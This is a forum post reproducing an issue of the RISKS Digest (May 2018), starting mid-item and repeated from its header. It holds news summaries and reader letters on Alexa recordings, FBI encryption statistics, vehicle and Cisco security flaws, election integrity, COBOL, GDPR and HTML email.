    ...."Unplug your Alexa devices right now," the user, Danielle (no last name
    given), was told by her husband's colleague in Seattle after he received
    full audio recordings between her and her husband, according to the KIRO-7
    report. The disturbed owner, who is shown in the report juggling four
    unplugged Echo Dot devices, said that the colleague then sent the offending
    audio to Danielle and her husband to confirm the paranoid-sounding
    allegation. (Before sending the audio, the colleague confirmed that the
    couple had been talking about hardwood floors.)

    After calling Amazon customer service, Danielle said she received the
    following explanation and response: "'Our engineers went through all of your
    logs. They saw exactly what you told us, exactly what you said happened, and
    we're sorry.' He apologized like 15 times in a matter of 30 minutes. 'This
    is something we need to fix.'" ... Ya think?

    ------------------------------

    Date: Tue, 22 May 2018 18:15:53 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: FBI dramatically overstates how many phones they can't get into (WaPo)

    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
    counted and would be flushed away as soon as they cast their ballot. Some
    angrily accused me to trying to take away their precious right to vote, for
    which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something, In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered
    ADD GIN TO VERMOUTH GIVING MARTINI;
    there aren't a lot of other options beyond
    COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially different.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that whole-heartedly
    approve. In Europe we seem to have this belief - apparently unheard of to
    Americans - that openness and fair dealing is much better all round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).

    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account, was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're suppose to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPPA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. Medical insurance industry should take note enhance patient
    database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
     
  4. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zach Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zach Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
